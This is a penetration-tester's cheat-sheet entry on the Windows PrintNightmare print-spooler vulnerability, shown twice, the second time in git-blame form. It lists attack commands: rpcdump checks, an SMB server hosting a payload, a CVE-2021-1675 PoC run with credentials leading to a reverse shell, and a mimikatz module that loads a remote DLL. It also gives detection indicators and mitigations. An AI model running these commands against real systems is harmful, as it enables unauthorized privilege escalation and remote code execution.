killchain-compendium/exploit/windows/print_nightmare/print_nightmare.md

# Print Nightmare

* Privilege Escalation using Print Spooler Service 
* Located at `C:\Windows\System32\spoolsv.exe` 
* Enabled by default
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
* RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`

## Usage

* Prepare reverse shell
* Check if target would be vulnerable
```sh
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
```
* Execute smb server
```sh
smbserver.py share . -smb2support
```
* Execute PoC with credentials to elevate
```sh
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
```
* Use the meterpreter session

### Mimikatz

* Printnightmare modules of mimikatz
```sh
misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll
```

## IOCs

* `pcAddPrinterDriverEx()` is called
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)

* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
* Event Ids `316, 808, 811, 31017, 7031`

## Mitigation

* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* Stop and disable
```sh
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
* Disable group policy
```sh
Computer Configuration/Administrative Templates/Printers
```
ettercap and binaries 2022-05-05 09:31:18 +02:00			`# Print Nightmare`

			`* Privilege Escalation using Print Spooler Service`
			* Located at `C:\Windows\System32\spoolsv.exe`
			`* Enabled by default`
			`* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler`
			* RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`

			`## Usage`

			`* Prepare reverse shell`
			`* Check if target would be vulnerable`
			```sh
			`rpcdump.py @$TARGET_IP \| grep -e 'MS-RPRN\|MS-PAR'`
			```
			`* Execute smb server`
			```sh
			`smbserver.py share . -smb2support`
			```
			`* Execute PoC with credentials to elevate`
			```sh
			`python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP`
			```
			`* Use the meterpreter session`

enumeration 2022-08-16 23:58:30 +02:00			`### Mimikatz`

			`* Printnightmare modules of mimikatz`
			```sh
			`misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll`
			```

ettercap and binaries 2022-05-05 09:31:18 +02:00			`## IOCs`

			* `pcAddPrinterDriverEx()` is called
			`* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them`
			`* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)`

			* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
			* Event Ids `316, 808, 811, 31017, 7031`

			`## Mitigation`

			`* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)`
			`* Stop and disable`
			```sh
			`Stop-Service -Name Spooler -Force`
			`Set-Service -Name Spooler -StartupType Disabled`
			```
			`* Disable group policy`
			```sh
			`Computer Configuration/Administrative Templates/Printers`
			```